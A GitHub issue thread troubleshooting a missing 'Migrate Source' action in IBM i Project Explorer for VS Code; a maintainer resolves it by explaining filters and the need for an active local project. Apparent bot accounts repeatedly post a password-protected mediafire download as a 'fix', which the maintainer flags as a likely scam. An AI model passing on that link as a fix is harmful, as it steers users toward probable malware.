### ISSUE TITLE
IBMi-bob migration

### ISSUE THREAD

**Issue by cosentino-smeup** [IBM/vscode-ibmi-projectexplorer#566]
I am migrating a library with IBMi-bob. I am using [this documentation](https://ibm.github.io/vscode-ibmi-projectexplorer/#/pages/projectExplorer/migrate-source). When I right click my library in the object browser, the function "Migrate source" doesn't show up like shown in the documentation.

This is the documentation menu:
![ibmi-bob-documentation](https://github.com/user-attachments/assets/d024c5f3-083e-4d75-904e-f83ab3ae2ee2)

This is what appears in my VS Code:
![ibmi-bob-my](https://github.com/user-attachments/assets/4e55ddb8-2b1b-41a4-8175-fa57f9bb2df3)

VS Code Version:

Version: 1.92.2
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
Date: 2024-08-14T17:29:30.058Z
Electron: 30.1.2
ElectronBuildId: 9870757
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Linux x64 6.8.0-40-generic

Code for IBM i version:

v2.12.2 (pre-release)

I tried the verion v2.12.1 as well but it doesn't change.

How can I run the migration?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cosentino-smeup** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Thank you. Do you have a fix for Linux Ubuntu?

**Comment by sebjulliand** [comment]
@cosentino-smeup these answers are presumably scams sent by bots. I wouldn't touch these files if I were you.

**Comment by cosentino-smeup** [comment]
> @cosentino-smeup these answers are presumably scams sent by bots. I wouldn't touch these files if I were you.

Thank you for the warning. Do you have any suggestion about my issue?

**Comment by sebjulliand** [comment]
> @sebjulliand, thank you for the warning. Do you have any suggestion about my issue?

Sure! According to your screenshot, you are right-clicking on a Filter item in the Object browser (the first-level items of the browser).

I can't see the definition of that filter, but what you'll need to do to get the filter to display a list of libraries when expanded is to define it like this (I'll assume you're targeting a library named `P_FENS`:
![image](https://github.com/user-attachments/assets/7d5e1d5d-f881-4810-b052-bc7d92e85067)

Notice the `*` wildcard at the end. This will force the filter to list all the libraries matching this pattern, hence creating a list of libraries when the filter gets expanded.

Alternatively, you can define your filter like this, listing only the *LIB objects from `QSYS` named `P_FENS` :
![image](https://github.com/user-attachments/assets/6166ee0c-612a-40ef-a86a-8e4122d7d764)

This one may run faster than the one above. Your call.

Once you get your library listed in the browser, you'll be able to right-click on it and see the `Migrate Source` action.

Hope this helps!

**Comment by cosentino-smeup** [comment]
> > @sebjulliand, thank you for the warning. Do you have any suggestion about my issue?
> 
> Sure! According to your screenshot, you are right-clicking on a Filter item in the Object browser (the first-level items of the browser).
> 
> I can't see the definition of that filter, but what you'll need to do to get the filter to display a list of libraries when expanded is to define it like this (I'll assume you're targeting a library named `P_FENS`: ![image](https://private-user-images.githubusercontent.com/11096890/361738336-7d5e1d5d-f881-4810-b052-bc7d92e85067.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTA5NzIsIm5iZiI6MTcyNDc1MDY3MiwicGF0aCI6Ii8xMTA5Njg5MC8zNjE3MzgzMzYtN2Q1ZTFkNWQtZjg4MS00ODEwLWIwNTItYmM3ZDkyZTg1MDY3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA5MjQzMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTNlZDBkNDU3Mjc5ZTM5YTIwZTRiNGY0MmNiYjJjNzI3MzE1MDBkY2I2YmU3ZTM1OWYxODhlMzVjZjljOWE2OTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.T_ccmn2magqG8NtmH6r-YGLmjT_1egqO0cHY1Hao5FU)
> 
> Notice the `*` wildcard at the end. This will force the filter to list all the libraries matching this pattern, hence creating a list of libraries when the filter gets expanded.
> 
> Alternatively, you can define your filter like this, listing only the *LIB objects from `QSYS` named `P_FENS` : ![image](https://private-user-images.githubusercontent.com/11096890/361739424-6166ee0c-612a-40ef-a86a-8e4122d7d764.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTA5NzIsIm5iZiI6MTcyNDc1MDY3MiwicGF0aCI6Ii8xMTA5Njg5MC8zNjE3Mzk0MjQtNjE2NmVlMGMtNjEyYS00MGVmLWE4NmEtOGU0MTIyZDdkNzY0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA5MjQzMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWM1YzMwNzcyYjMyNGU0YTQ0YzUyMzM5MjcwN2ZkMWJiNzY5YTZmZjI0NTA3MzMzMDE3ZTVlOWUxZTU2MjIwOTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.TPYrMYq5ciwXxJgvjGJwCcxHEAWT7DNrTLz0FZsBd-E)
> 
> This one may run faster than the one above. Your call.
> 
> Once you get your library listed in the browser, you'll be able to right-click on it and see the `Migrate Source` action.
> 
> Hope this helps!
Thanks @sebjulliand. Yes, P_FENCE is the name of the library I am migrating.

I tried both the filters but unfortunately when I right click the object in the browser I can't see the Migrate Source action. I tried clicking on each level of the browser.

This is the list of the Filters:
![Filters](https://github.com/user-attachments/assets/1f1f356b-0157-4bef-a270-2fa9b3e94afa)

This is the P_FENCE_CNV filter (the new one)

**Comment by cosentino-smeup** [comment]
I noticed that when I expand the filter P_FENCE_CNV there is nothing below it while in the filter P_FENCE I can see all objects

**Comment by sebjulliand** [comment]
Do you have an active project in your Project Explorer?
![image](https://github.com/user-attachments/assets/884bd82a-416e-4cca-981c-f0795f7378e1)

If not, you'll need to have one before the action can show up.

**Comment by cosentino-smeup** [comment]
No I don't. I don't understand how to open the Project Explorer. I can see just: 
- help and support
- user library list
- object browser
- IFS browser

How can I open it?

**Comment by cosentino-smeup** [comment]
> Since IBM i projects are local projects from your workspace, you access it from VSCode's Explorer view: ![image](https://private-user-images.githubusercontent.com/11096890/361755268-21c1bbc5-f36a-47c0-b503-1dc0664f2ef3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTMzMTUsIm5iZiI6MTcyNDc1MzAxNSwicGF0aCI6Ii8xMTA5Njg5MC8zNjE3NTUyNjgtMjFjMWJiYzUtZjM2YS00N2MwLWI1MDMtMWRjMDY2NGYyZWYzLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEwMDMzNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJkNWFlOGExNmZlZTcwYjM2MDA0NTY5OTU0MmFiNTBkMDM3MWNhNDlhYjA2YjRiNjBiNTQzZjYyOGEyMmNkMTEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.MknxiFrf2zW0g0AIwxlzHS_TXLKveF0EhN6IVDoC2EE)
> 
> Check out [this documentation](https://ibm.github.io/vscode-ibmi-projectexplorer/#/pages/projectExplorer/create-new-project) about how to create a new project.

Yes, that was it !!! Now it works.

Thank you

**Comment by sebjulliand** [comment]
Perfect, you're welcome!
